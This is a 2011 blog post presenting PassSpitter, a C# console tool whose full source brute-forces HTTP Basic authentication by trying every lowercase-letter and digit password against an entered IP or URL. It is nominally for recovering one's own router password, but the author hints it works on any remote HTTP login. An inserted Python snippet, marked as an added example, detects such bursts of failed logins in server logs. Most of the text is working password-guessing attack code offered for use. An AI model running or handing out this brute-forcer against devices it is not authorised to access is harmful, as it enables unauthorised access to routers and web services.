
Want to get in YOUR router, lost the password, can't reset it?

posted Sep 6, 2011 5:20 AM by Mad Logik   [ updated Sep 6, 2011 12:08 PM ]


Well my friend, today is your lucky day. 
I took a brute-force approach to the problem. 
Some old tools I used in the past are no longer working properly... (remember Brutus?!!)
And I had in the past tried my luck at this, but aimed too high and got lost in recursive functions...

So there you have it. 
MadLogik's very own:  
PassSpitter v1.0

v1.0 Screenshot: 


Usage: (really? just start it up and you should be gold!) Obviously what you will need is TIME and not SKILLS!

1: Double-click on the cute PassSpitter icon; a console-like window will open (see screenshot above)
2: Enter the minimum length to start with... I suggest 0, but if you know it's 8 characters long, then you would save quite some time starting at 8 right away!
3: Enter the IP... now this tool is meant to be used with your OWN router over your LAN for TESTING PURPOSES.... but it will work with any remote HTTP auth request... ;)
4: Enter the username, admin for most routers... but I found out my Linksys WRT610N will take ANY username! :$
5: Let it do its magic.. you will get updates when you get to the next letter... and live password display ... it's not slowing down the software enough for me to take it off...
6: Get the resolved password when you hear the beep!

ps: should something go wrong (that means, if the software gets anything other than a "401 unauthorized" message) then you will be asked if you want to continue or not... simply enter "n" to stop... close the window and start it back up ... choice is yours!

Good to know: Currently, it's only going to try lowercase letters and numbers ... otherwise it becomes too much of a task... and you should have access to the reset switch on your router after all ;) 
private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1','2','3','4','5', '6','7','8','9','0'};
In other versions I will allow you to choose... if I ever make other versions ;) After all, you can download the source below, a free version of Visual C# 2010 and run this the way YOU want... ;)
//private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '$', '#', '@', '-' }; //... who knows ? !! :P 

Download Links: 

I found the debug version to run faster but it's also more prone to receiving errors or simply crashing...
I found the speed to be between 50 and 150 passwords per second. Not bad at all!
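
Seen from the defending side, a run at the 50 to 150 requests per second quoted above is a dense burst of 401 responses from one client address. The Python sketch below is an added example, not part of PassSpitter or the original post; it flags such bursts in Common Log Format lines, and the log format, window, threshold and sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: ip ident user [timestamp] "request" status size
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) ')
WINDOW = timedelta(seconds=10)  # assumed sliding window
THRESHOLD = 30                  # assumed: far above a human mistyping a password

def detect_bruteforce(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: {"failures": n, "success_after": bool}} for flagged sources."""
    recent = defaultdict(deque)  # ip -> timestamps of 401s still inside the window
    totals = defaultdict(int)    # ip -> all 401s seen so far
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue             # skip lines that are not in the expected format
        ip, status = m["ip"], int(m["status"])
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if status == 401:
            totals[ip] += 1
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                flagged.setdefault(ip, {"success_after": False})
            if ip in flagged:
                flagged[ip]["failures"] = totals[ip]
        elif ip in flagged and 200 <= status < 300:
            # A 2xx right after a burst of 401s suggests a guess was accepted.
            flagged[ip]["success_after"] = True
    return flagged

def sample_log():
    """Constructed log lines; every address and timestamp here is made up."""
    fmt = '{ip} - admin [06/Sep/2011:05:20:{s:02d} -0400] "GET / HTTP/1.1" {st} 0'
    guesses = [fmt.format(ip="192.168.1.50", s=i // 60, st=401) for i in range(180)]
    hit = [fmt.format(ip="192.168.1.50", s=3, st=200)]
    typo = [fmt.format(ip="192.168.1.20", s=s, st=st)
            for s, st in [(10, 401), (25, 401), (40, 200)]]
    return guesses + hit + typo

if __name__ == "__main__":
    for ip, info in detect_bruteforce(sample_log()).items():
        print(ip, info)
```

The detector keys on the client address rather than the username, since a router that accepts any username (as noted in step 4) makes per-account failure counts meaningless.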

BY THE WAY: 
I must give credit to Janosh Woschitz for most of the code in the bruteforce engine! Thanks Mate.
I just hacked in some web auth testing code and set up a loop for my needs... looks dirty but it all works quite well!

If you have comments, hit me up on twitter
See ya!

Ohhh yeah... the code... Well, here's the project files... and below the code..

Code: 

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net;
using System.Web;
using System.IO;

namespace PassSpitter
{
    class Program
    {
        #region Private variables

        // the secret password which we will try to find via brute force
        private static string result;
        private static bool isMatched = false;
        private static bool isFailing = false;

        /* The length of the charactersToTest Array is stored in a
        * additional variable to increase performance  */
        private static int charactersToTestLength = 0;
        private static long computedKeys = 0;

        /* An array containing the characters which will be used to create the brute force keys,
        * if less characters are used (e.g. only lower case chars) the faster the password is matched  */
        private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1','2','3','4','5', '6','7','8','9','0'};

        //private static char[] charactersToTest = { '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' };
        //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' };
        //private static char[] charactersToTest = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z' };
        //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' };
        //private static char[] charactersToTest = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' };
        //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' };
        //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '$', '#', '@', '-' };

        #endregion

        static void Main(string[] args)
        {
        starthere:
            Console.Clear();
            Console.WriteLine("**********************************************************************");
            Console.WriteLine("****** MadLogik's PassSpitter v1.0 (c) 2011  madlogik@gmail.com ******");
            Console.WriteLine("**********************************************************************");

            // The length of the array is stored permanently during runtime
            charactersToTestLength = charactersToTest.Length;

            // The length of the password is unknown, so we have to run through the full search space
            Console.WriteLine("\nEnter the minimum password length");
            var estimatedPasswordLength = (int.Parse(Console.ReadLine()) - 1);

            //if people enter 0 .. it will be -1... so lets fix that.. :P
            if (estimatedPasswordLength < 0) { estimatedPasswordLength = 0; }

            Console.WriteLine("Enter the URL like http://192.168.1.1 or just the ip:");
            string mytargetip = Console.ReadLine();

            if (!mytargetip.Contains("http"))
            {
                mytargetip = "http://" + mytargetip;
            }

            Console.WriteLine("Enter the Username like admin:");
            string myusername = Console.ReadLine();

            var timeStarted = DateTime.Now;
            Console.WriteLine("Start BruteForce - {0}", timeStarted.ToString());

            while (!isMatched)
            {
                /* The estimated length of the password will be increased and every possible key for this
                * key length will be created and compared against the password */
                estimatedPasswordLength++;
                startBruteForce(estimatedPasswordLength, myusername, mytargetip);
                Console.WriteLine("\nTime elapsed: {0}s, Passwords tested: {1}, Pass/sec: {2}", DateTime.Now.Subtract(timeStarted).TotalSeconds, computedKeys, (computedKeys / DateTime.Now.Subtract(timeStarted).TotalSeconds));
            }

            Console.WriteLine("\n**********************************************************************");
            Console.Beep(500, 500);
            Console.Beep(300, 250);
            Console.Beep(500, 500);
            Console.WriteLine("Password matched. - {0}", DateTime.Now.ToString());
            Console.WriteLine("Time passed: {0}s", DateTime.Now.Subtract(timeStarted).TotalSeconds);
            Console.WriteLine("Resolved password: {0}", result);
            Console.WriteLine("Computed keys: {0}", computedKeys);

            //end
            Console.ReadLine();
            Console.WriteLine("Do you want to try again?");
            string wannarideagain = Console.ReadLine();
            if (wannarideagain == "y")
            {
                isMatched = false;
                isFailing = false;
                computedKeys = 0;
                charactersToTestLength = 0;
                goto starthere;
            }
        }

        #region Private methods

        /// <summary>
        /// Starts the recursive method which will create the keys via brute force
        /// </summary>
        /// <param name="keyLength">The length of the key</param>
        private static void startBruteForce(int keyLength, string myusername, string mytargetip)
        {
            if (!isMatched)
            {
                Console.WriteLine("\nTesting passwords with {0} letters or numbers", keyLength);
                var keyChars = createCharArray(keyLength, charactersToTest[0]);
                // The index of the last character will be stored for slight performance improvement
                var indexOfLastChar = keyLength - 1;
                createNewKey(0, keyChars, keyLength, indexOfLastChar, myusername, mytargetip);
            }
            else
            { return; }
        }

        /// <summary>
        /// Creates a new char array of a specific length filled with the defaultChar
        /// </summary>
        /// <param name="length">The length of the array</param>
        /// <param name="defaultChar">The char with whom the array will be filled</param>
        /// <returns></returns>
        private static char[] createCharArray(int length, char defaultChar)
        {
            return (from c in new char[length] select defaultChar).ToArray();
        }

        /// <summary>
        /// This is the main workhorse, it creates new keys and compares them to the password until the password
        /// is matched or all keys of the current key length have been checked
        /// </summary>
        /// <param name="currentCharPosition">The position of the char which is replaced by new characters currently</param>
        /// <param name="keyChars">The current key represented as char array</param>
        /// <param name="keyLength">The length of the key</param>
        /// <param name="indexOfLastChar">The index of the last character of the key</param>
        private static void createNewKey(int currentCharPosition, char[] keyChars, int keyLength, int indexOfLastChar, string myusername, string mytargetip)
        {
            if (!isMatched)
            {
                var nextCharPosition = currentCharPosition + 1;
                // We are looping through the full length of our charactersToTest array
                for (int i = 0; i < charactersToTestLength; i++)
                {
                    /* The character at the currentCharPosition will be replaced by a
                    * new character from the charactersToTest array => a new key combination will be created */
                    keyChars[currentCharPosition] = charactersToTest[i];
                    // The method calls itself recursively until all positions of the key char array have been replaced
                    if (currentCharPosition < indexOfLastChar)
                    {
                        createNewKey(nextCharPosition, keyChars, keyLength, indexOfLastChar, myusername, mytargetip);
                    }
                    else
                    {
                        // A new key has been created, remove this counter to improve performance
                        computedKeys++;

                        /* The char array will be converted to a string and compared to the password. If the password
                        * is matched the loop breaks and the password is stored as result. */
                        string mypassword = new String(keyChars);
                        string mycontent = "";
                        if (isFailing)
                        {
                            Console.WriteLine("\nWarning! You are not getting the expected 401 unauth message... Continue y/n ?");
                            string failcontinue = Console.ReadLine();
                            if (failcontinue == "n")
                            {
                                isMatched = true;
                                result = "Operation Failed!";
                                return;
                            }
                        }

                        try
                        {
                            WebRequest myReq = WebRequest.Create(mytargetip);
                            string usernamePassword = myusername + ":" + mypassword;
                            CredentialCache mycache = new CredentialCache();
                            mycache.Add(new Uri(mytargetip), "Basic", new NetworkCredential(myusername, mypassword));
                            myReq.Credentials = mycache;
                            myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(usernamePassword)));
                            // if it breaks... it's here. 401 unauth
                            WebResponse wr = myReq.GetResponse();
                            Stream receiveStream = wr.GetResponseStream();
                            StreamReader reader = new StreamReader(receiveStream, Encoding.UTF8);
                            mycontent += reader.ReadLine();
                            mycontent += System.Environment.NewLine;
                            string currline = mycontent;
                            while (currline != null)
                            {
                                currline = reader.ReadLine();
                                mycontent += currline + System.Environment.NewLine;
                            }
                            reader.Close();

                            //Console.Write(mycontent); //source code!!!

                            //MessageBox.Show("The Password is: " + password, "Password Found!");
                            isMatched = true;
                            result = new String(keyChars);
                            return;
                        }
                        catch (Exception exx)
                        {
                            Console.Write("\rTesting Password: {0}", new String(keyChars));
                            if (!exx.Message.ToString().Contains("401"))
                            {
                                isFailing = true;
                                Console.WriteLine("\n\r{0}", exx.Message.ToString());
                                return;
                            }
                        }
                    }
                }
            }
            else
            { return; }
        }

        #endregion
    }
}



WARNING: Don't you dare try this tool to hack into a server that isn't yours! Be a gentleman about it.